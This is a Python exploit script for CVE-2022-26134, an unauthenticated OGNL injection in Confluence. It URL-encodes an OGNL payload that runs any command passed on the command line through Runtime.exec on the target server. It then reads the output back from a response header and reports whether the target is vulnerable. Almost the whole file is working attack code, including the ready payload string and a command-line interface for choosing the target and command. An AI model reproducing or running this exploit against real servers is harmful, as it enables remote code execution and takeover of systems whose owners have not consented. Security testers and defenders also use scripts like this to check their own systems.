cve_2022_26134.py

# -*- coding: utf-8 -*-

import requests
import urllib
import urllib3
import argparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/509.36 (KHTML, like Gecko) Safari/509.36"}

def cve_2022_26134(url, cmd):
    try:
        cmd = urllib.quote(cmd)
    except Exception as e:
        from urllib.parse import quote
        cmd = quote(cmd)
    payload = '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/'.format(cmd)
    url = url + '/' + payload
    req = requests.get(url, headers=headers, allow_redirects=False, verify=False)
    if req.status_code == 302 and 'X-Response' in req.headers:
        print('[+] Target is vulnerable!')
        print('[+] Command exec output: ' + req.headers['X-Response'])
    else:
        print('[-] The target does not appear to be vulnerable')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='（CVE-2022-26134）an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server')
    parser.add_argument('-url', help='target url，如 http://127.0.0.1:8080', required=True)
    parser.add_argument('-cmd', help='command to execute, 如 whoami', required=True)
    args = parser.parse_args()
    cve_2022_26134(args.url, args.cmd)